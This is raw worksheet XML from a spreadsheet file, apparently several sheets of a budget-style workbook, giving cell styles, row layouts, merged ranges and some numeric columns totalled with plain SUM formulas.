      <c r="B2" s="786"/>
      <c r="C2" s="786"/>
      <c r="D2" s="25"/>
      <c r="E2" s="25"/>
      <c r="F2" s="25"/>
      <c r="G2" s="25"/>
    </row>
    <row r="3" spans="1:7" ht="18.600000000000001" customHeight="1">
      <c r="A3" s="26"/>
      <c r="B3" s="26"/>
      <c r="C3" s="27"/>
      <c r="D3" s="25"/>
      <c r="E3" s="25"/>
      <c r="F3" s="25"/>
      <c r="G3" s="25"/>
    </row>
    <row r="4" spans="1:7" ht="27.95" customHeight="1">
      <c r="A4" s="28" t="s">
        <v>427</v>
      </c>
      <c r="B4" s="28" t="s">
        <v>1237</v>
      </c>
      <c r="C4" s="28" t="s">
        <v>1249</v>
      </c>
      <c r="D4" s="25"/>
      <c r="E4" s="25"/>
      <c r="F4" s="25"/>
      <c r="G4" s="25"/>
    </row>
    <row r="5" spans="1:7" ht="27.95" customHeight="1">
      <c r="A5" s="29" t="s">
        <v>1250</v>
      </c>
      <c r="B5" s="29" t="s">
        <v>1251</v>
      </c>
      <c r="C5" s="30" t="s">
        <v>1252</v>
      </c>
      <c r="D5" s="25"/>
      <c r="E5" s="25"/>
      <c r="F5" s="25"/>
      <c r="G5" s="25"/>
    </row>
    <row r="6" spans="1:7" ht="27.95" customHeight="1">
      <c r="A6" s="29" t="s">
        <v>1253</v>
      </c>
      <c r="B6" s="29" t="s">
        <v>1254</v>
      </c>
      <c r="C6" s="30" t="s">
        <v>1255</v>
      </c>
      <c r="D6" s="25"/>
      <c r="E6" s="25"/>
      <c r="F6" s="25"/>
      <c r="G6" s="25"/>
    </row>
    <row r="7" spans="1:7" ht="39.75" customHeight="1">
      <c r="A7" s="29" t="s">
        <v>1256</v>
      </c>
      <c r="B7" s="29" t="s">
        <v>1257</v>
      </c>
      <c r="C7" s="30" t="s">
        <v>1255</v>
      </c>
      <c r="D7" s="25"/>
      <c r="E7" s="25"/>
      <c r="F7" s="25"/>
      <c r="G7" s="25"/>
    </row>
    <row r="8" spans="1:7" ht="27.95" customHeight="1">
      <c r="A8" s="29" t="s">
        <v>1258</v>
      </c>
      <c r="B8" s="29" t="s">
        <v>1259</v>
      </c>
      <c r="C8" s="30" t="s">
        <v>1255</v>
      </c>
      <c r="D8" s="25"/>
      <c r="E8" s="25"/>
      <c r="F8" s="25"/>
      <c r="G8" s="25"/>
    </row>
    <row r="9" spans="1:7" ht="27.95" customHeight="1">
      <c r="A9" s="29" t="s">
        <v>1260</v>
      </c>
      <c r="B9" s="29" t="s">
        <v>1261</v>
      </c>
      <c r="C9" s="30" t="s">
        <v>1252</v>
      </c>
      <c r="D9" s="25"/>
      <c r="E9" s="25"/>
      <c r="F9" s="25"/>
      <c r="G9" s="25"/>
    </row>
    <row r="10" spans="1:7" ht="27.95" customHeight="1">
      <c r="A10" s="29" t="s">
        <v>1262</v>
      </c>
      <c r="B10" s="29" t="s">
        <v>1263</v>
      </c>
      <c r="C10" s="30" t="s">
        <v>1255</v>
      </c>
      <c r="D10" s="25"/>
      <c r="E10" s="25"/>
      <c r="F10" s="25"/>
      <c r="G10" s="25"/>
    </row>
    <row r="11" spans="1:7" ht="27.95" customHeight="1">
      <c r="A11" s="29" t="s">
        <v>435</v>
      </c>
      <c r="B11" s="29" t="s">
        <v>1264</v>
      </c>
      <c r="C11" s="30" t="s">
        <v>1252</v>
      </c>
      <c r="D11" s="25"/>
      <c r="E11" s="25"/>
      <c r="F11" s="25"/>
      <c r="G11" s="25"/>
    </row>
    <row r="12" spans="1:7" ht="40.5" customHeight="1">
      <c r="A12" s="29" t="s">
        <v>1265</v>
      </c>
      <c r="B12" s="29" t="s">
        <v>1266</v>
      </c>
      <c r="C12" s="30" t="s">
        <v>1252</v>
      </c>
      <c r="D12" s="25"/>
      <c r="E12" s="25"/>
      <c r="F12" s="25"/>
      <c r="G12" s="25"/>
    </row>
    <row r="13" spans="1:7" ht="27.95" customHeight="1">
      <c r="A13" s="29" t="s">
        <v>1267</v>
      </c>
      <c r="B13" s="29" t="s">
        <v>1264</v>
      </c>
      <c r="C13" s="30" t="s">
        <v>1255</v>
      </c>
      <c r="D13" s="25"/>
      <c r="E13" s="25"/>
      <c r="F13" s="25"/>
      <c r="G13" s="25"/>
    </row>
    <row r="14" spans="1:7" ht="27.95" customHeight="1">
      <c r="A14" s="29" t="s">
        <v>1268</v>
      </c>
      <c r="B14" s="29" t="s">
        <v>1251</v>
      </c>
      <c r="C14" s="30" t="s">
        <v>1255</v>
      </c>
      <c r="D14" s="25"/>
      <c r="E14" s="25"/>
      <c r="F14" s="25"/>
      <c r="G14" s="25"/>
    </row>
    <row r="15" spans="1:7" ht="27.95" customHeight="1">
      <c r="A15" s="31" t="s">
        <v>1269</v>
      </c>
      <c r="B15" s="30" t="s">
        <v>1270</v>
      </c>
      <c r="C15" s="30" t="s">
        <v>1255</v>
      </c>
      <c r="D15" s="25"/>
      <c r="E15" s="25"/>
      <c r="F15" s="25"/>
      <c r="G15" s="25"/>
    </row>
    <row r="16" spans="1:7" ht="27.95" customHeight="1"/>
    <row r="17" ht="27.95" customHeight="1"/>
    <row r="18" ht="27.95" customHeight="1"/>
    <row r="19" ht="27.95" customHeight="1"/>
    <row r="20" ht="27.95" customHeight="1"/>
    <row r="21" ht="27.95" customHeight="1"/>
    <row r="22" ht="27.95" customHeight="1"/>
    <row r="23" ht="27.95" customHeight="1"/>
    <row r="24" ht="27.95" customHeight="1"/>
    <row r="25" ht="27.95" customHeight="1"/>
    <row r="26" ht="27.95" customHeight="1"/>
    <row r="27" ht="27.95" customHeight="1"/>
  </sheetData>
  <sortState ref="A5:C27">
    <sortCondition ref="C5:C27"/>
  </sortState>
  <mergeCells count="1">
    <mergeCell ref="A2:C2"/>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zoomScale="98" zoomScaleNormal="98" workbookViewId="0">
      <selection activeCell="F9" sqref="F9"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="10" defaultRowHeight="14.25"/>
  <cols>
    <col min="1" max="1" width="27.5703125" style="2" customWidth="1"/>
    <col min="2" max="4" width="7.85546875" style="2" customWidth="1"/>
    <col min="5" max="5" width="23" style="2" customWidth="1"/>
    <col min="6" max="8" width="7.7109375" style="2" customWidth="1"/>
    <col min="9" max="16384" width="10" style="2"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:8" ht="18" customHeight="1">
      <c r="A1" s="3" t="s">
        <v>1271</v>
      </c>
      <c r="B1" s="4"/>
      <c r="C1" s="5"/>
      <c r="D1" s="6"/>
      <c r="H1" s="6"/>
    </row>
    <row r="2" spans="1:8" ht="39.75" customHeight="1">
      <c r="A2" s="787" t="s">
        <v>1272</v>
      </c>
      <c r="B2" s="787"/>
      <c r="C2" s="787"/>
      <c r="D2" s="787"/>
      <c r="E2" s="787"/>
      <c r="F2" s="787"/>
      <c r="G2" s="787"/>
      <c r="H2" s="787"/>
    </row>
    <row r="3" spans="1:8" ht="25.5" customHeight="1">
      <c r="A3" s="788" t="s">
        <v>456</v>
      </c>
      <c r="B3" s="788"/>
      <c r="C3" s="788"/>
      <c r="D3" s="788"/>
      <c r="E3" s="788"/>
      <c r="F3" s="788"/>
      <c r="G3" s="788"/>
      <c r="H3" s="788"/>
    </row>
    <row r="4" spans="1:8" ht="61.5" customHeight="1">
      <c r="A4" s="7" t="s">
        <v>1273</v>
      </c>
      <c r="B4" s="7" t="s">
        <v>272</v>
      </c>
      <c r="C4" s="8" t="s">
        <v>275</v>
      </c>
      <c r="D4" s="9" t="s">
        <v>958</v>
      </c>
      <c r="E4" s="7" t="s">
        <v>1274</v>
      </c>
      <c r="F4" s="7" t="s">
        <v>272</v>
      </c>
      <c r="G4" s="8" t="s">
        <v>275</v>
      </c>
      <c r="H4" s="9" t="s">
        <v>958</v>
      </c>
    </row>
    <row r="5" spans="1:8" ht="38.1" customHeight="1">
      <c r="A5" s="10" t="s">
        <v>1275</v>
      </c>
      <c r="B5" s="20"/>
      <c r="C5" s="11"/>
      <c r="D5" s="12"/>
      <c r="E5" s="13" t="s">
        <v>1276</v>
      </c>
      <c r="F5" s="21"/>
      <c r="G5" s="14"/>
      <c r="H5" s="12"/>
    </row>
    <row r="6" spans="1:8" ht="38.1" customHeight="1">
      <c r="A6" s="13" t="s">
        <v>1277</v>
      </c>
      <c r="B6" s="20"/>
      <c r="C6" s="11"/>
      <c r="D6" s="12"/>
      <c r="E6" s="10" t="s">
        <v>1278</v>
      </c>
      <c r="F6" s="21"/>
      <c r="G6" s="14"/>
      <c r="H6" s="12"/>
    </row>
    <row r="7" spans="1:8" ht="38.1" customHeight="1">
      <c r="A7" s="15" t="s">
        <v>299</v>
      </c>
      <c r="B7" s="16"/>
      <c r="C7" s="16"/>
      <c r="D7" s="17"/>
      <c r="E7" s="15" t="s">
        <v>334</v>
      </c>
      <c r="F7" s="22"/>
      <c r="G7" s="22"/>
      <c r="H7" s="17"/>
    </row>
    <row r="8" spans="1:8" ht="38.1" customHeight="1">
      <c r="A8" s="13" t="s">
        <v>1005</v>
      </c>
      <c r="B8" s="11"/>
      <c r="C8" s="11"/>
      <c r="D8" s="18"/>
      <c r="E8" s="13" t="s">
        <v>1279</v>
      </c>
      <c r="F8" s="14"/>
      <c r="G8" s="14"/>
      <c r="H8" s="18"/>
    </row>
    <row r="9" spans="1:8" ht="38.1" customHeight="1">
      <c r="A9" s="15" t="s">
        <v>308</v>
      </c>
      <c r="B9" s="16"/>
      <c r="C9" s="16"/>
      <c r="D9" s="19"/>
      <c r="E9" s="15" t="s">
        <v>341</v>
      </c>
      <c r="F9" s="16"/>
      <c r="G9" s="16"/>
      <c r="H9" s="19"/>
    </row>
    <row r="10" spans="1:8" ht="21.75" customHeight="1">
      <c r="A10" s="2" t="s">
        <v>1280</v>
      </c>
    </row>
  </sheetData>
  <mergeCells count="2">
    <mergeCell ref="A2:H2"/>
    <mergeCell ref="A3:H3"/>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zoomScale="95" zoomScaleNormal="95" workbookViewId="0">
      <selection activeCell="F7" sqref="F7"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="10" defaultRowHeight="14.25"/>
  <cols>
    <col min="1" max="1" width="28.28515625" style="2" customWidth="1"/>
    <col min="2" max="4" width="8.28515625" style="2" customWidth="1"/>
    <col min="5" max="5" width="21" style="2" customWidth="1"/>
    <col min="6" max="8" width="9.7109375" style="2" customWidth="1"/>
    <col min="9" max="16384" width="10" style="2"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:8" ht="18" customHeight="1">
      <c r="A1" s="3" t="s">
        <v>1281</v>
      </c>
      <c r="B1" s="4"/>
      <c r="C1" s="5"/>
      <c r="D1" s="6"/>
      <c r="H1" s="6"/>
    </row>
    <row r="2" spans="1:8" ht="39.75" customHeight="1">
      <c r="A2" s="787" t="s">
        <v>1282</v>
      </c>
      <c r="B2" s="787"/>
      <c r="C2" s="787"/>
      <c r="D2" s="787"/>
      <c r="E2" s="787"/>
      <c r="F2" s="787"/>
      <c r="G2" s="787"/>
      <c r="H2" s="787"/>
    </row>
    <row r="3" spans="1:8" ht="25.5" customHeight="1">
      <c r="A3" s="788" t="s">
        <v>456</v>
      </c>
      <c r="B3" s="788"/>
      <c r="C3" s="788"/>
      <c r="D3" s="788"/>
      <c r="E3" s="788"/>
      <c r="F3" s="788"/>
      <c r="G3" s="788"/>
      <c r="H3" s="788"/>
    </row>
    <row r="4" spans="1:8" ht="65.25" customHeight="1">
      <c r="A4" s="7" t="s">
        <v>1273</v>
      </c>
      <c r="B4" s="7" t="s">
        <v>275</v>
      </c>
      <c r="C4" s="8" t="s">
        <v>1283</v>
      </c>
      <c r="D4" s="9" t="s">
        <v>958</v>
      </c>
      <c r="E4" s="7" t="s">
        <v>1274</v>
      </c>
      <c r="F4" s="7" t="s">
        <v>275</v>
      </c>
      <c r="G4" s="8" t="s">
        <v>1283</v>
      </c>
      <c r="H4" s="9" t="s">
        <v>958</v>
      </c>
    </row>
    <row r="5" spans="1:8" ht="56.25" customHeight="1">
      <c r="A5" s="10" t="s">
        <v>1275</v>
      </c>
      <c r="B5" s="11"/>
      <c r="C5" s="11"/>
      <c r="D5" s="12"/>
      <c r="E5" s="13" t="s">
        <v>1276</v>
      </c>
      <c r="F5" s="14"/>
      <c r="G5" s="14"/>
      <c r="H5" s="12"/>
    </row>
    <row r="6" spans="1:8" ht="38.1" customHeight="1">
      <c r="A6" s="13" t="s">
        <v>1277</v>
      </c>
      <c r="B6" s="11"/>
      <c r="C6" s="11"/>
      <c r="D6" s="12"/>
      <c r="E6" s="10" t="s">
        <v>1278</v>
      </c>
      <c r="F6" s="14"/>
      <c r="G6" s="14"/>
      <c r="H6" s="12"/>
    </row>
    <row r="7" spans="1:8" s="1" customFormat="1" ht="38.1" customHeight="1">
      <c r="A7" s="15" t="s">
        <v>299</v>
      </c>
      <c r="B7" s="16"/>
      <c r="C7" s="16"/>
      <c r="D7" s="17"/>
      <c r="E7" s="15" t="s">
        <v>334</v>
      </c>
      <c r="F7" s="16"/>
      <c r="G7" s="16"/>
      <c r="H7" s="17"/>
    </row>
    <row r="8" spans="1:8" ht="38.1" customHeight="1">
      <c r="A8" s="13" t="s">
        <v>1005</v>
      </c>
      <c r="B8" s="11"/>
      <c r="C8" s="11"/>
      <c r="D8" s="18"/>
      <c r="E8" s="13" t="s">
        <v>1279</v>
      </c>
      <c r="F8" s="14"/>
      <c r="G8" s="14"/>
      <c r="H8" s="18"/>
    </row>
    <row r="9" spans="1:8" ht="38.1" customHeight="1">
      <c r="A9" s="15" t="s">
        <v>308</v>
      </c>
      <c r="B9" s="16"/>
      <c r="C9" s="16"/>
      <c r="D9" s="19"/>
      <c r="E9" s="15" t="s">
        <v>341</v>
      </c>
      <c r="F9" s="16"/>
      <c r="G9" s="16"/>
      <c r="H9" s="19"/>
    </row>
    <row r="10" spans="1:8" ht="24" customHeight="1">
      <c r="A10" s="2" t="s">
        <v>1280</v>
      </c>
    </row>
  </sheetData>
  <mergeCells count="2">
    <mergeCell ref="A2:H2"/>
    <mergeCell ref="A3:H3"/>
  </mergeCells>
  <phoneticPr fontId="54" type="noConversion"/>
  <printOptions horizontalCentered="1"/>
  <pageMargins left="0.39305555555555599" right="0.39305555555555599" top="0.39305555555555599" bottom="0.39305555555555599" header="0.5" footer="0.5"/>
  <pageSetup paperSize="9" scale="9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zoomScale="91" zoomScaleNormal="91" workbookViewId="0">
      <pane ySplit="5" topLeftCell="A6" activePane="bottomLeft" state="frozen"/>
      <selection pane="bottomLeft" activeCell="C23" sqref="C23"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="10" defaultRowHeight="14.25"/>
  <cols>
    <col min="1" max="1" width="31.28515625" style="607" customWidth="1"/>
    <col min="2" max="3" width="14.42578125" style="608" customWidth="1"/>
    <col min="4" max="4" width="14.42578125" style="609" customWidth="1"/>
    <col min="5" max="5" width="14.42578125" style="608" customWidth="1"/>
    <col min="6" max="16384" width="10" style="608"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:5" s="601" customFormat="1" ht="21" customHeight="1">
      <c r="A1" s="610" t="s">
        <v>309</v>
      </c>
      <c r="B1" s="611"/>
      <c r="C1" s="611"/>
      <c r="D1" s="612"/>
      <c r="E1" s="611"/>
    </row>
    <row r="2" spans="1:5" s="602" customFormat="1" ht="28.5" customHeight="1">
      <c r="A2" s="645" t="s">
        <v>310</v>
      </c>
      <c r="B2" s="645"/>
      <c r="C2" s="645"/>
      <c r="D2" s="645"/>
      <c r="E2" s="645"/>
    </row>
    <row r="3" spans="1:5" s="603" customFormat="1" ht="24" customHeight="1">
      <c r="B3" s="613"/>
      <c r="C3" s="613"/>
      <c r="D3" s="613"/>
      <c r="E3" s="613" t="s">
        <v>270</v>
      </c>
    </row>
    <row r="4" spans="1:5" s="604" customFormat="1" ht="21.95" customHeight="1">
      <c r="A4" s="649" t="s">
        <v>271</v>
      </c>
      <c r="B4" s="646" t="s">
        <v>272</v>
      </c>
      <c r="C4" s="647" t="s">
        <v>273</v>
      </c>
      <c r="D4" s="646" t="s">
        <v>274</v>
      </c>
      <c r="E4" s="646" t="s">
        <v>275</v>
      </c>
    </row>
    <row r="5" spans="1:5" s="605" customFormat="1" ht="14.25" customHeight="1">
      <c r="A5" s="650"/>
      <c r="B5" s="646"/>
      <c r="C5" s="648"/>
      <c r="D5" s="646"/>
      <c r="E5" s="646"/>
    </row>
    <row r="6" spans="1:5" s="606" customFormat="1" ht="21.95" customHeight="1">
      <c r="A6" s="614" t="s">
        <v>311</v>
      </c>
      <c r="B6" s="563">
        <v>24031</v>
      </c>
      <c r="C6" s="563">
        <v>32136</v>
      </c>
      <c r="D6" s="615">
        <v>25136</v>
      </c>
      <c r="E6" s="563">
        <v>29100</v>
      </c>
    </row>
    <row r="7" spans="1:5" s="606" customFormat="1" ht="21.95" customHeight="1">
      <c r="A7" s="614" t="s">
        <v>312</v>
      </c>
      <c r="B7" s="563"/>
      <c r="C7" s="563">
        <v>59</v>
      </c>
      <c r="D7" s="615">
        <v>59</v>
      </c>
      <c r="E7" s="563">
        <v>64</v>
      </c>
    </row>
    <row r="8" spans="1:5" s="606" customFormat="1" ht="21.95" customHeight="1">
      <c r="A8" s="614" t="s">
        <v>313</v>
      </c>
      <c r="B8" s="563">
        <v>9559</v>
      </c>
      <c r="C8" s="563">
        <v>13202</v>
      </c>
      <c r="D8" s="615">
        <v>13202</v>
      </c>
      <c r="E8" s="563">
        <v>9500</v>
      </c>
    </row>
    <row r="9" spans="1:5" s="606" customFormat="1" ht="21.95" customHeight="1">
      <c r="A9" s="614" t="s">
        <v>314</v>
      </c>
      <c r="B9" s="563">
        <v>45438</v>
      </c>
      <c r="C9" s="563">
        <v>47604</v>
      </c>
      <c r="D9" s="615">
        <v>45604</v>
      </c>
      <c r="E9" s="563">
        <v>46000</v>
      </c>
    </row>
    <row r="10" spans="1:5" s="606" customFormat="1" ht="21.95" customHeight="1">
      <c r="A10" s="614" t="s">
        <v>315</v>
      </c>
      <c r="B10" s="563">
        <v>9757</v>
      </c>
      <c r="C10" s="563">
        <v>8259</v>
      </c>
      <c r="D10" s="615">
        <v>6359</v>
      </c>
      <c r="E10" s="563">
        <v>13500</v>
      </c>
    </row>
    <row r="11" spans="1:5" s="606" customFormat="1" ht="21.95" customHeight="1">
      <c r="A11" s="614" t="s">
        <v>316</v>
      </c>
      <c r="B11" s="563">
        <v>1059</v>
      </c>
      <c r="C11" s="563">
        <v>1711</v>
      </c>
      <c r="D11" s="615">
        <v>1711</v>
      </c>
      <c r="E11" s="563">
        <v>580</v>
      </c>
    </row>
    <row r="12" spans="1:5" s="606" customFormat="1" ht="21.95" customHeight="1">
      <c r="A12" s="614" t="s">
        <v>317</v>
      </c>
      <c r="B12" s="563">
        <v>15277</v>
      </c>
      <c r="C12" s="563">
        <v>23003</v>
      </c>
      <c r="D12" s="615">
        <v>23003</v>
      </c>
      <c r="E12" s="563">
        <v>19500</v>
      </c>
    </row>
    <row r="13" spans="1:5" s="606" customFormat="1" ht="21.95" customHeight="1">
      <c r="A13" s="614" t="s">
        <v>318</v>
      </c>
      <c r="B13" s="563">
        <v>14218</v>
      </c>
      <c r="C13" s="563">
        <v>15222</v>
      </c>
      <c r="D13" s="615">
        <v>12422</v>
      </c>
      <c r="E13" s="563">
        <v>18556</v>
      </c>
    </row>
    <row r="14" spans="1:5" s="606" customFormat="1" ht="21.95" customHeight="1">
      <c r="A14" s="614" t="s">
        <v>319</v>
      </c>
      <c r="B14" s="563">
        <v>2200</v>
      </c>
      <c r="C14" s="563">
        <v>2002</v>
      </c>
      <c r="D14" s="615">
        <v>2002</v>
      </c>
      <c r="E14" s="563">
        <v>600</v>
      </c>
    </row>
    <row r="15" spans="1:5" s="606" customFormat="1" ht="21.95" customHeight="1">
      <c r="A15" s="614" t="s">
        <v>320</v>
      </c>
      <c r="B15" s="563">
        <v>4583</v>
      </c>
      <c r="C15" s="563">
        <v>6552</v>
      </c>
      <c r="D15" s="615">
        <v>6552</v>
      </c>
      <c r="E15" s="563">
        <v>7000</v>
      </c>
    </row>
    <row r="16" spans="1:5" s="606" customFormat="1" ht="21.95" customHeight="1">
      <c r="A16" s="614" t="s">
        <v>321</v>
      </c>
      <c r="B16" s="563">
        <v>15738</v>
      </c>
      <c r="C16" s="563">
        <v>16189</v>
      </c>
      <c r="D16" s="615">
        <v>16189</v>
      </c>
      <c r="E16" s="563">
        <v>16100</v>
      </c>
    </row>
    <row r="17" spans="1:5" s="606" customFormat="1" ht="21.95" customHeight="1">
      <c r="A17" s="614" t="s">
        <v>322</v>
      </c>
      <c r="B17" s="563">
        <v>1901</v>
      </c>
      <c r="C17" s="563">
        <v>6000</v>
      </c>
      <c r="D17" s="615">
        <v>6000</v>
      </c>
      <c r="E17" s="563">
        <v>50</v>
      </c>
    </row>
    <row r="18" spans="1:5" s="606" customFormat="1" ht="21.95" customHeight="1">
      <c r="A18" s="614" t="s">
        <v>323</v>
      </c>
      <c r="B18" s="563">
        <v>1733</v>
      </c>
      <c r="C18" s="563">
        <v>3076</v>
      </c>
      <c r="D18" s="615">
        <v>2076</v>
      </c>
      <c r="E18" s="563">
        <v>1356</v>
      </c>
    </row>
    <row r="19" spans="1:5" s="606" customFormat="1" ht="21.95" customHeight="1">
      <c r="A19" s="614" t="s">
        <v>324</v>
      </c>
      <c r="B19" s="563">
        <v>5842</v>
      </c>
      <c r="C19" s="563">
        <v>4518</v>
      </c>
      <c r="D19" s="615">
        <v>4518</v>
      </c>
      <c r="E19" s="563">
        <v>2600</v>
      </c>
    </row>
    <row r="20" spans="1:5" s="606" customFormat="1" ht="21.95" customHeight="1">
      <c r="A20" s="616" t="s">
        <v>325</v>
      </c>
      <c r="B20" s="563">
        <v>206</v>
      </c>
      <c r="C20" s="563">
        <v>455</v>
      </c>
      <c r="D20" s="615">
        <v>455</v>
      </c>
      <c r="E20" s="563">
        <v>208</v>
      </c>
    </row>
    <row r="21" spans="1:5" s="606" customFormat="1" ht="21.95" customHeight="1">
      <c r="A21" s="616" t="s">
        <v>326</v>
      </c>
      <c r="B21" s="563"/>
      <c r="C21" s="563"/>
      <c r="D21" s="615"/>
      <c r="E21" s="563"/>
    </row>
    <row r="22" spans="1:5" s="606" customFormat="1" ht="31.5" customHeight="1">
      <c r="A22" s="616" t="s">
        <v>327</v>
      </c>
      <c r="B22" s="563">
        <v>424</v>
      </c>
      <c r="C22" s="563">
        <v>302</v>
      </c>
      <c r="D22" s="615">
        <v>302</v>
      </c>
      <c r="E22" s="563">
        <v>186</v>
      </c>
    </row>
    <row r="23" spans="1:5" s="606" customFormat="1" ht="21.95" customHeight="1">
      <c r="A23" s="616" t="s">
        <v>328</v>
      </c>
      <c r="B23" s="563">
        <v>14085</v>
      </c>
      <c r="C23" s="563">
        <v>9700</v>
      </c>
      <c r="D23" s="615">
        <v>9700</v>
      </c>
      <c r="E23" s="563">
        <v>10500</v>
      </c>
    </row>
    <row r="24" spans="1:5" s="606" customFormat="1" ht="21.95" customHeight="1">
      <c r="A24" s="616" t="s">
        <v>329</v>
      </c>
      <c r="B24" s="563"/>
      <c r="C24" s="563"/>
      <c r="D24" s="615"/>
      <c r="E24" s="563"/>
    </row>
    <row r="25" spans="1:5" s="606" customFormat="1" ht="36" customHeight="1">
      <c r="A25" s="616" t="s">
        <v>330</v>
      </c>
      <c r="B25" s="563">
        <v>1976</v>
      </c>
      <c r="C25" s="563">
        <v>2683</v>
      </c>
      <c r="D25" s="615">
        <v>2683</v>
      </c>
      <c r="E25" s="563">
        <v>2800</v>
      </c>
    </row>
    <row r="26" spans="1:5" s="606" customFormat="1" ht="21.95" customHeight="1">
      <c r="A26" s="616" t="s">
        <v>331</v>
      </c>
      <c r="B26" s="563"/>
      <c r="C26" s="563">
        <v>2000</v>
      </c>
      <c r="D26" s="615">
        <v>2000</v>
      </c>
      <c r="E26" s="563"/>
    </row>
    <row r="27" spans="1:5" s="606" customFormat="1" ht="21.95" customHeight="1">
      <c r="A27" s="616" t="s">
        <v>332</v>
      </c>
      <c r="B27" s="563">
        <v>10158</v>
      </c>
      <c r="C27" s="563">
        <v>9542</v>
      </c>
      <c r="D27" s="615">
        <v>9542</v>
      </c>
      <c r="E27" s="563">
        <v>9486</v>
      </c>
    </row>
    <row r="28" spans="1:5" s="606" customFormat="1" ht="21.95" customHeight="1">
      <c r="A28" s="614" t="s">
        <v>333</v>
      </c>
      <c r="B28" s="494">
        <v>330</v>
      </c>
      <c r="C28" s="494"/>
      <c r="D28" s="617"/>
      <c r="E28" s="494"/>
    </row>
    <row r="29" spans="1:5" s="604" customFormat="1" ht="21.95" customHeight="1">
      <c r="A29" s="618" t="s">
        <v>334</v>
      </c>
      <c r="B29" s="427">
        <f>SUM(B6:B28)</f>
        <v>178515</v>
      </c>
      <c r="C29" s="427">
        <f>SUM(C6:C28)</f>
        <v>204215</v>
      </c>
      <c r="D29" s="427">
        <f>SUM(D6:D28)</f>
        <v>189515</v>
      </c>
      <c r="E29" s="427">
        <f>SUM(E6:E28)</f>
        <v>187686</v>
      </c>
    </row>
    <row r="30" spans="1:5" s="604" customFormat="1" ht="21.95" customHeight="1">
      <c r="A30" s="619" t="s">
        <v>335</v>
      </c>
      <c r="B30" s="620">
        <f>SUM(B31:B35)</f>
        <v>302322</v>
      </c>
      <c r="C30" s="620">
        <f>SUM(C31:C35)</f>
        <v>185085</v>
      </c>
      <c r="D30" s="620">
        <f>SUM(D31:D35)</f>
        <v>168000</v>
      </c>
      <c r="E30" s="620">
        <f>SUM(E31:E35)</f>
        <v>158347</v>
      </c>
    </row>
    <row r="31" spans="1:5" s="606" customFormat="1" ht="21.95" customHeight="1">
      <c r="A31" s="460" t="s">
        <v>336</v>
      </c>
      <c r="B31" s="563">
        <v>112890</v>
      </c>
      <c r="C31" s="563">
        <v>14300</v>
      </c>
      <c r="D31" s="563">
        <v>14300</v>
      </c>
      <c r="E31" s="563">
        <v>14300</v>
      </c>
    </row>
    <row r="32" spans="1:5" s="606" customFormat="1" ht="21.95" customHeight="1">
      <c r="A32" s="559" t="s">
        <v>337</v>
      </c>
      <c r="B32" s="563">
        <v>169010</v>
      </c>
      <c r="C32" s="563">
        <v>170785</v>
      </c>
      <c r="D32" s="563">
        <v>153700</v>
      </c>
      <c r="E32" s="563">
        <v>120617</v>
      </c>
    </row>
    <row r="33" spans="1:5" s="606" customFormat="1" ht="21.95" customHeight="1">
      <c r="A33" s="562" t="s">
        <v>338</v>
      </c>
      <c r="B33" s="563"/>
      <c r="C33" s="563"/>
      <c r="D33" s="563"/>
      <c r="E33" s="563">
        <v>16000</v>
      </c>
    </row>
    <row r="34" spans="1:5" s="606" customFormat="1" ht="21.95" customHeight="1">
      <c r="A34" s="562" t="s">
        <v>339</v>
      </c>
      <c r="B34" s="563"/>
      <c r="C34" s="563"/>
      <c r="D34" s="563"/>
      <c r="E34" s="563"/>
    </row>
    <row r="35" spans="1:5" s="606" customFormat="1" ht="21.95" customHeight="1">
      <c r="A35" s="559" t="s">
        <v>340</v>
      </c>
      <c r="B35" s="615">
        <v>20422</v>
      </c>
      <c r="C35" s="615"/>
      <c r="D35" s="615"/>
      <c r="E35" s="615">
        <v>7430</v>
      </c>
    </row>
    <row r="36" spans="1:5" s="606" customFormat="1" ht="21.95" customHeight="1">
      <c r="A36" s="564" t="s">
        <v>341</v>
      </c>
      <c r="B36" s="427">
        <f>B30+B29</f>
        <v>480837</v>
      </c>
      <c r="C36" s="427">
        <f>C30+C29</f>
        <v>389300</v>
      </c>
      <c r="D36" s="427">
        <f>D30+D29</f>
        <v>357515</v>
      </c>
      <c r="E36" s="427">
        <f>E30+E29</f>
        <v>346033</v>
      </c>
    </row>
  </sheetData>
  <mergeCells count="6">
    <mergeCell ref="A2:E2"/>
    <mergeCell ref="A4:A5"/>
    <mergeCell ref="B4:B5"/>
    <mergeCell ref="C4:C5"/>
    <mergeCell ref="D4:D5"/>
    <mergeCell ref="E4:E5"/>
  </mergeCells>
  <phoneticPr fontId="54" type="noConversion"/>
  <printOptions horizontalCentered="1"/>
  <pageMargins left="0.39305555555555599" right="0.39305555555555599" top="0.39305555555555599" bottom="0.39305555555555599" header="0.5" footer="0.5"/>
  <pageSetup paperSize="9" scale="9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
  <sheetViews>
    <sheetView zoomScale="91" zoomScaleNormal="91" workbookViewId="0">
      <pane ySplit="4" topLeftCell="A5" activePane="bottomLeft" state="frozen"/>
      <selection pane="bottomLeft" activeCell="B17" sqref="B17"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="9.85546875" defaultRowHeight="14.25"/>
  <cols>
    <col min="1" max="1" width="64.7109375" style="513" customWidth="1"/>
    <col min="2" max="2" width="29" style="513" customWidth="1"/>
    <col min="3" max="16383" width="9.85546875" style="513"/>
    <col min="16384" max="16384" width="9.85546875" style="2"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:2 16384:16384" s="509" customFormat="1" ht="21" customHeight="1">
      <c r="A1" s="515" t="s">
        <v>342</v>
      </c>
    </row>
    <row r="2" spans="1:2 16384:16384" s="510" customFormat="1" ht="54.75" customHeight="1">
      <c r="A2" s="651" t="s">
        <v>343</v>
      </c>
      <c r="B2" s="651"/>
    </row>
    <row r="3" spans="1:2 16384:16384" s="511" customFormat="1" ht="24.6" customHeight="1">
      <c r="B3" s="516" t="s">
        <v>270</v>
      </c>
    </row>
    <row r="4" spans="1:2 16384:16384" s="512" customFormat="1" ht="21" customHeight="1">
      <c r="A4" s="517" t="s">
        <v>344</v>
      </c>
      <c r="B4" s="518" t="s">
        <v>345</v>
      </c>
    </row>
    <row r="5" spans="1:2 16384:16384" s="513" customFormat="1" ht="21" customHeight="1">
      <c r="A5" s="519" t="s">
        <v>346</v>
      </c>
